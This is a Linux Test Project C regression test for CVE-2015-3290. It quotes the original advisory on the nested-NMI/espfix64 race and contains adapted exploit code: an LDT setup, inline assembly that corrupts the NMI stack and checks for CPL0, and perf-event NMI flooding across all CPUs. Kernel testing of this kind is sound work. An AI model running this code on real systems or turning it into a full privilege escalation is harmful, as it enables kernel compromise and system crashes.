| // SPDX-License-Identifier: GPL-2.0-or-later |
| /* |
| * Copyright (c) 2017 Pavel Boldin <pboldin@cloudlinux.com> |
| * Copyright (c) 2018-2022 Linux Test Project |
| */ |
| |
| /* |
| |
| NOTE: rather than checking for full nested NMI exploitation we simply check |
| that the NMI stack state can be corrupted with this code. |
| |
| http://www.openwall.com/lists/oss-security/2015/08/04/8 |
| |
| > +++++ CVE-2015-3290 +++++ |
| > |
| > High impact NMI bug on x86_64 systems 3.13 and newer, embargoed. Also fixed |
| by: |
| > |
| > https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=9b6e6a8334d56354853f9c255d1395c2ba570e0a |
| > |
| > The other fix (synchronous modify_ldt) does *not* fix CVE-2015-3290. |
| > |
| > You can mitigate CVE-2015-3290 by blocking modify_ldt or |
| > perf_event_open using seccomp. A fully-functional, portable, reliable |
| > exploit is privately available and will be published in a week or two. |
| > *Patch your systems* |
| |
| And here's a real advisory: |
| |
| If an NMI returns via espfix64 and is interrupted during espfix64 setup |
| by another NMI, the return state is corrupt. This is exploitable for |
| reliable privilege escalation on any Linux x86_64 system in which |
| untrusted code can arrange for espfix64 to be invoked and for NMIs to be |
| nested. |
| |
| Glossing over a lot of details, the basic structure of Linux' nested NMI |
| handling is: |
| |
| nmi_handler: |
| if (in_nmi) { |
| nmi_latched = true; |
| return; |
| } |
| in_nmi = true; |
| handle the nmi; |
| atomically (this is magic): |
| if (nmi_latched) { |
| nmi_latched = false; |
| start over; |
| } else { |
| in_nmi = false; |
| return and unmask NMIs; |
| } |
| |
| Alas, on x86_64, there is no reasonable way to block NMIs to run the |
| atomic part of that pseudocode atomically. Instead, the entire atomic |
| piece is implemented by the single instruction IRET. |
| |
| But x86_64 is more broken than just that. The IRET instruction does not |
| restore register state correctly [1] when returning to a 16-bit stack |
| segment. x86_64 has a complicated workaround called espfix64. If |
| espfix64 is invoked on return, a well-behaved IRET is emulated by a |
| complicated scheme that involves manually switching stacks. During the |
| stack switch, there is a window of approximately 19 instructions between |
| the start of espfix64's access to the original stack and when espfix64 |
| is done with the original stack. If a nested NMI occurs during this |
| window, then the atomic part of the basic nested NMI algorithm is |
| observably non-atomic. |
| |
| Depending on exactly where in this window the nested NMI hits, the |
| results vary. Most nested NMIs will corrupt the return context and |
| crash the calling process. Some are harmless except that the nested NMI |
| gets ignored. There is a two-instruction window in which the return |
| context ends up with user-controlled RIP and CS set to __KERNEL_CS. |
| |
| A careful exploit (attached) can recover from all the crashy failures |
| and can regenerate a valid *privileged* state if a nested NMI occurs |
| during the two-instruction window. This exploit appears to work |
| reasonably quickly across a fairly wide range of Linux versions. |
| |
| If you have SMEP, this exploit is likely to panic the system. Writing |
| a usable exploit against a SMEP system would be considerably more |
| challenging, but it's surely possible. |
| |
| Measures like UDEREF are unlikely to help, because this bug is outside |
| any region that can be protected using paging or segmentation tricks. |
| However, recent grsecurity kernels seem to forcibly disable espfix64, so |
| they're not vulnerable in the first place. |
| |
| A couple of notes: |
| |
| - This exploit's payload just prints the text "CPL0". The exploit |
| will keep going after printing CPL0 so you can enjoy seeing the |
| frequency with which it wins. Interested parties could easily |
| write different payloads. I doubt that any existing exploit |
| mitigation techniques would be useful against this type of |
| attack. |
| |
| - If you are using a kernel older than v4.1, a 64-bit build of the |
| exploit will trigger a signal handling bug and crash. Defenders |
| should not rejoice, because the exploit works fine when build |
| as a 32-bit binary or (so I'm told) as an x32 binary. |
| |
| - This is the first exploit I've ever written that contains genuine |
| hexadecimal code. The more assembly-minded among you can have |
| fun figuring out why :) |
| |
| [1] By "correctly", I mean that the register state ends up different |
| from that which was saved in the stack frame, not that the |
| implementation doesn't match the spec in the microcode author's minds. |
| The spec is simply broken (differently on AMD and Intel hardware, |
| perhaps unsurprisingly.) |
| |
| --Andy |
| */ |
| |
| #include "config.h" |
| #include "tst_test.h" |
| #include "tst_timer.h" |
| |
| #if defined(__x86_64__) || defined(__i386__) |
| |
| #include <stdlib.h> |
| #include <stdio.h> |
| #include <inttypes.h> |
| #include <asm/ldt.h> |
| #include <unistd.h> |
| #include <sys/syscall.h> |
| #include <setjmp.h> |
| #include <signal.h> |
| #include <string.h> |
| #include <sys/wait.h> |
| #include <linux/perf_event.h> |
| |
| #include "lapi/syscalls.h" |
| #include "tst_safe_pthread.h" |
| |
| /* Abstractions for some 32-bit vs 64-bit differences. */ |
| #ifdef __x86_64__ |
| # define REG_IP REG_RIP |
| # define REG_SP REG_RSP |
| # define REG_AX REG_RAX |
| |
| struct selectors { |
| unsigned short cs, gs, fs, ss; |
| }; |
| |
| LTP_ATTRIBUTE_UNUSED |
| static unsigned short *ssptr(ucontext_t *ctx) |
| { |
| struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS]; |
| return &sels->ss; |
| } |
| |
| LTP_ATTRIBUTE_UNUSED |
| static unsigned short *csptr(ucontext_t *ctx) |
| { |
| struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS]; |
| return &sels->cs; |
| } |
| #else |
| # define REG_IP REG_EIP |
| # define REG_SP REG_ESP |
| # define REG_AX REG_EAX |
| # define REG_CR2 (REG_SS + 3) |
| |
| LTP_ATTRIBUTE_UNUSED |
| static greg_t *ssptr(ucontext_t *ctx) |
| { |
| return &ctx->uc_mcontext.gregs[REG_SS]; |
| } |
| |
| LTP_ATTRIBUTE_UNUSED |
| static greg_t *csptr(ucontext_t *ctx) |
| { |
| return &ctx->uc_mcontext.gregs[REG_CS]; |
| } |
| #endif |
| |
| static volatile long expected_rsp; |
| static int running = 1; |
| |
| static void set_ldt(void) |
| { |
| /* Boring 16-bit data segment. */ |
| const struct user_desc data_desc = { |
| .entry_number = 0, |
| .base_addr = 0, |
| .limit = 0xfffff, |
| .seg_32bit = 0, |
| .contents = 0, /* Data, expand-up */ |
| .read_exec_only = 0, |
| .limit_in_pages = 0, |
| .seg_not_present = 0, |
| .useable = 0 |
| }; |
| |
| TEST((int)tst_syscall(__NR_modify_ldt, 1, &data_desc, |
| sizeof(data_desc))); |
| if (TST_RET == -EINVAL) { |
| tst_brk(TCONF | TRERRNO, |
| "modify_ldt: 16-bit data segments are probably disabled"); |
| } else if (TST_RET != 0) { |
| tst_brk(TBROK | TRERRNO, "modify_ldt"); |
| } |
| } |
| |
| static void try_corrupt_stack(unsigned short orig_ss) |
| { |
| #ifdef __x86_64__ |
| asm volatile ( |
| /* A small puzzle for the curious reader. */ |
| "mov $2048, %%rbp \n\t" |
| |
| /* Save rsp for diagnostics */ |
| "mov %%rsp, %[expected_rsp] \n\t" |
| |
| /* |
| * Let 'er rip. |
| */ |
| "mov %[ss], %%ss \n\t" /* begin corruption */ |
| "movl $1000, %%edx \n\t" |
| "1: decl %%edx \n\t" |
| "jnz 1b \n\t" |
| "mov %%ss, %%eax \n\t" /* grab SS to display */ |
| |
| /* Did we enter CPL0? */ |
| "mov %%cs, %%dx \n\t" |
| "testw $3, %%dx \n\t" |
| "jnz 2f \n\t" |
| "leaq 3f(%%rip), %%rcx \n\t" |
| "movl $0x200, %%r11d \n\t" |
| "sysretq \n\t" |
| "2: \n\t" |
| |
| /* |
| * Stop further corruption. We need to check CPL |
| * first because we need RPL == CPL. |
| */ |
| "mov %[orig_ss], %%ss \n\t" /* end corruption */ |
| |
| "subq $128, %%rsp \n\t" |
| "pushfq \n\t" |
| "testl $(1<<9),(%%rsp) \n\t" |
| "addq $136, %%rsp \n\t" |
| "jz 3f \n\t" |
| "cmpl %[ss], %%eax \n\t" |
| "je 4f \n\t" |
| "3: int3 \n\t" |
| "4: \n\t" |
| : [expected_rsp] "=m" (expected_rsp) |
| : [ss] "r" (0x7), [orig_ss] "m" (orig_ss) |
| : "rax", "rcx", "rdx", "rbp", "r11", "flags" |
| ); |
| #else |
| asm volatile ( |
| /* A small puzzle for the curious reader. */ |
| "mov %%ebp, %%esi \n\t" |
| "mov $2048, %%ebp \n\t" |
| |
| /* Save rsp for diagnostics */ |
| "mov %%esp, %[expected_rsp] \n\t" |
| |
| /* |
| * Let 'er rip. |
| */ |
| "mov %[ss], %%ss \n\t" /* begin corruption */ |
| "movl $1000, %%edx \n\t" |
| "1: .byte 0xff, 0xca \n\t" /* decl %edx */ |
| "jnz 1b \n\t" |
| "mov %%ss, %%eax \n\t" /* grab SS to display */ |
| |
| /* Did we enter CPL0? */ |
| "mov %%cs, %%dx \n\t" |
| "testw $3, %%dx \n\t" |
| "jnz 2f \n\t" |
| ".code64 \n\t" |
| "leaq 3f(%%rip), %%rcx \n\t" |
| "movl $0x200, %%r11d \n\t" |
| "sysretl \n\t" |
| ".code32 \n\t" |
| "2: \n\t" |
| |
| /* |
| * Stop further corruption. We need to check CPL |
| * first because we need RPL == CPL. |
| */ |
| "mov %[orig_ss], %%ss \n\t" /* end corruption */ |
| |
| "pushf \n\t" |
| "testl $(1<<9),(%%esp) \n\t" |
| "addl $4, %%esp \n\t" |
| "jz 3f \n\t" |
| "cmpl %[ss], %%eax \n\t" |
| "je 4f \n\t" |
| "3: int3 \n\t" |
| "4: mov %%esi, %%ebp \n\t" |
| : [expected_rsp] "=m" (expected_rsp) |
| : [ss] "r" (0x7), [orig_ss] "m" (orig_ss) |
| : "eax", "ecx", "edx", "esi", "flags" |
| ); |
| #endif |
| } |
| |
| static int perf_event_open(struct perf_event_attr *hw_event, pid_t pid, |
| int cpu, int group_fd, unsigned long flags) |
| { |
| int ret; |
| |
| ret = tst_syscall(__NR_perf_event_open, hw_event, pid, cpu, |
| group_fd, flags); |
| return ret; |
| } |
| |
| static int event_mlock_kb; |
| static int max_sample_rate; |
| |
| static void *child_thread(void *arg LTP_ATTRIBUTE_UNUSED) |
| { |
| long niter = 0; |
| unsigned short orig_ss; |
| |
| struct perf_event_attr pe = { |
| .size = sizeof(struct perf_event_attr), |
| .disabled = 0, |
| .exclude_kernel = 0, |
| .exclude_hv = 0, |
| .freq = 1, |
| .sample_type = PERF_SAMPLE_IP|PERF_SAMPLE_TID| |
| PERF_SAMPLE_TIME|PERF_SAMPLE_CALLCHAIN| |
| PERF_SAMPLE_ID|PERF_SAMPLE_PERIOD, |
| }; |
| /* Workaround bug in GCC 4.4.7 (CentOS6) */ |
| pe.sample_freq = max_sample_rate / 5; |
| |
| struct { |
| uint32_t type; |
| uint64_t config; |
| const char *name; |
| } perf_events[] = { |
| { |
| .type = PERF_TYPE_HARDWARE, |
| .config = PERF_COUNT_HW_INSTRUCTIONS, |
| .name = "hw instructions", |
| }, |
| { |
| .type = PERF_TYPE_HARDWARE, |
| .config = PERF_COUNT_HW_CACHE_REFERENCES, |
| .name = "hw cache references", |
| }, |
| }; |
| |
| void *perf_mmaps[ARRAY_SIZE(perf_events)]; |
| unsigned int i; |
| |
| for (i = 0; i < ARRAY_SIZE(perf_events); i++) { |
| int fd; |
| |
| pe.type = perf_events[i].type; |
| pe.config = perf_events[i].config; |
| |
| fd = perf_event_open(&pe, 0, -1, -1, 0); |
| if (fd == -1) { |
| if (errno == EINVAL || errno == ENOENT || |
| errno == EBUSY) |
| tst_brk(TCONF | TERRNO, |
| "no hardware counters"); |
| else |
| tst_brk(TBROK | TERRNO, "perf_event_open"); |
| /* tst_brk exits */ |
| } |
| |
| perf_mmaps[i] = SAFE_MMAP(NULL, event_mlock_kb * 1024, |
| PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); |
| SAFE_CLOSE(fd); |
| } |
| |
| asm volatile ("mov %%ss, %0" : "=rm" (orig_ss)); |
| |
| for (niter = 0; running && niter < 1000*1000*1000L; niter++) { |
| |
| try_corrupt_stack(orig_ss); |
| |
| /* |
| * If we ended up with IF == 0, there's no easy way to fix |
| * it. Instead, make frequent syscalls to avoid hanging |
| * the system. |
| */ |
| syscall(0x3fffffff); |
| } |
| |
| for (i = 0; i < ARRAY_SIZE(perf_events); i++) |
| if (perf_mmaps[i] != MAP_FAILED) |
| SAFE_MUNMAP(perf_mmaps[i], 512 * 1024); |
| |
| return (void *)niter; |
| } |
| |
| static void do_child(void) |
| { |
| int i, ncpus; |
| pthread_t *threads; |
| long iter, total_iter = 0; |
| |
| tst_res(TINFO, "attempting to corrupt nested NMI stack state"); |
| |
| set_ldt(); |
| |
| ncpus = tst_ncpus(); |
| threads = SAFE_MALLOC(sizeof(*threads) * ncpus); |
| |
| for (i = 0; i < ncpus; i++) |
| SAFE_PTHREAD_CREATE(&threads[i], NULL, child_thread, NULL); |
| |
| sleep(tst_remaining_runtime()); |
| running = 0; |
| |
| for (i = 0; i < ncpus; i++) { |
| SAFE_PTHREAD_JOIN(threads[i], (void **)&iter); |
| total_iter += iter; |
| } |
| free(threads); |
| |
| tst_res(TPASS, "can't corrupt nested NMI state after %ld iterations", |
| total_iter); |
| } |
| |
| static void setup(void) |
| { |
| /* |
| * According to perf_event_open's manpage, the official way of |
| * knowing if perf_event_open() support is enabled is checking for |
| * the existence of the file /proc/sys/kernel/perf_event_paranoid. |
| */ |
| if (access("/proc/sys/kernel/perf_event_paranoid", F_OK) == -1) |
| tst_brk(TCONF, "Kernel doesn't have perf_event support"); |
| |
| SAFE_FILE_SCANF("/proc/sys/kernel/perf_event_mlock_kb", |
| "%d", &event_mlock_kb); |
| SAFE_FILE_SCANF("/proc/sys/kernel/perf_event_max_sample_rate", |
| "%d", &max_sample_rate); |
| } |
| |
| static void run(void) |
| { |
| pid_t pid; |
| int status; |
| |
| |
| pid = SAFE_FORK(); |
| if (pid == 0) { |
| do_child(); |
| return; |
| } |
| |
| SAFE_WAITPID(pid, &status, 0); |
| if (WIFSIGNALED(status) && WTERMSIG(status) == SIGSEGV) |
| tst_res(TFAIL, "corrupted NMI stack"); |
| else if (WIFEXITED(status) && WEXITSTATUS(status) != 0) |
| tst_res(WEXITSTATUS(status), "Propogate child status"); |
| } |
| |
| static struct tst_test test = { |
| .forks_child = 1, |
| .needs_root = 1, |
| .needs_checkpoints = 1, |
| .setup = setup, |
| .max_runtime = 180, |
| .test_all = run, |
| .tags = (const struct tst_tag[]) { |
| {"linux-git", "9b6e6a8334d5"}, |
| {"CVE", "2015-3290"}, |
| {} |
| } |
| }; |
| |
| #else /* defined(__x86_64__) || defined(__i386__) */ |
| |
| TST_TEST_TCONF("not (i386 or x86_64)"); |
| |
| #endif |